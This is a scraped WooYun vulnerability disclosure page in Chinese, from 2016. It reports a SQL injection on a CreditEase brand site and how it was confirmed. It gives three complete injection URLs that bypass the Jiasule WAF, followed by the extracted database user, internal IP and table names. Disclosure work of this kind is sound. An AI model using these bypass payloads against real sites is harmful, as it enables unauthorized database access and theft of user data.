宜信某站SQL注入绕过加速乐 | wooyun-2016-0186614| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0186614

漏洞标题：宜信某站SQL注入绕过加速乐

漏洞作者：学习委员

提交时间：2016-03-19 19:19

修复时间：2016-05-04 18:15

公开时间：2016-05-04 18:15

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-19：细节已通知厂商并且等待厂商处理中
2016-03-20：厂商已经确认，细节仅向厂商公开
2016-03-30：细节向核心白帽子及相关领域专家公开
2016-04-09：细节向普通白帽子公开
2016-04-19：细节向实习白帽子公开
2016-05-04：细节向公众公开

简要描述：

我知道这次可能上不了首页了。但是看在我花了三天时间过加速乐的份上给我全额RANK\WB吧 (^ωω^)

详细说明：

受影响站点：http://brand.creditease.cn（和 brcms.yixin.com 指向同一站点）
概述：本来发现三处注入的，但是一觉醒来有两处不见了（出问题的文件被删除了）。本来想找真实IP绑定hosts 访问的，奈何没找到，只能苦逼的走上绕加速乐的路，痛并快乐着。

出问题的URL：http://brand.creditease.cn/activity-single.htm?id=22

给出过 加速乐 的几个Vector：
（1）http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(user/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
（2）http://brand.creditease.cn/activity-single.htm
?id=225.0UNION SELECT 1,(2),3,4,5,6,7,8,9,10,11,12,13,14,15,(`version`/*gdfger41gg4df5g41gdf5g4eredfg1df6g4d%0d%0a*/())
（3）http://brand.creditease.cn/activity-single.htm?id=225.0UNION /*!34000select-1.0%0a*/ ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,(table_name) from`information_schema`.`tables`where`table_schema`='viweb' limit 0,1%23

跑出点数据证明一下（详细数据不跑）：

version() 和 user()
mysql 5.5.18.1-log
viweb@10.171.198.115

数据库
information_schema
mysql
performance_schema
viweb

数据表
activity
activity_agenda
activity_agenda2
activity_awards
activity_day
activity_honored_guest
activity_honored_guest_talk
activity_phases
activity_signup
activity_watch
file
file_type
interactive
interactive_honored_guest
interactive_votee
interactive_voter
interactive_watch
page_main
product
product_category
product_content
user_admin
user_info
user_other
user_pw_by_mail
user_safe
vi
vi_file
vi_file_category
vi_first_menu
vi_second_menu
z
z_state
z_type

漏洞证明：

已证明如上

修复方案：

不能太依赖 waf

版权声明：转载请注明来源学习委员@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-20 18:15

厂商回复：

漏洞已确认，安排修复中。感谢白帽子提醒。
白帽子奖励正在申请中。。。

漏洞评价：

评价

2016-03-20 19:37 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:17 | 百里长苏)

白帽子奖励正在申请中。。白帽子奖励申请失败.. 欢迎惠顾
2016-03-20 19:44 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 )

看到这句话：我花了三天时间过加速乐的份上。我果断关注你了。哈哈哈哈。
2016-03-20 20:34 | 学习委员 ( 实习白帽子 | Rank:96 漏洞数:7 | 人生真是寂寞如雪！)

@_Thorns 不会令你失望的，哈哈
2016-03-20 23:17 | Exploit DB ( 普通白帽子 | Rank:405 漏洞数:125 | 水能载舟，亦可覆舟)

就喜欢这种有耐心的白帽子果断关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0186614

漏洞标题：宜信某站SQL注入绕过加速乐

相关厂商：宜信

漏洞作者：学习委员

提交时间：2016-03-19 19:19

修复时间：2016-05-04 18:15

公开时间：2016-05-04 18:15

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源学习委员@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0186614

漏洞标题：宜信某站SQL注入绕过加速乐

相关厂商：宜信

漏洞作者： 学习委员

提交时间：2016-03-19 19:19

修复时间：2016-05-04 18:15

公开时间：2016-05-04 18:15

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0186614"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 学习委员@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：学习委员

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源学习委员@乌云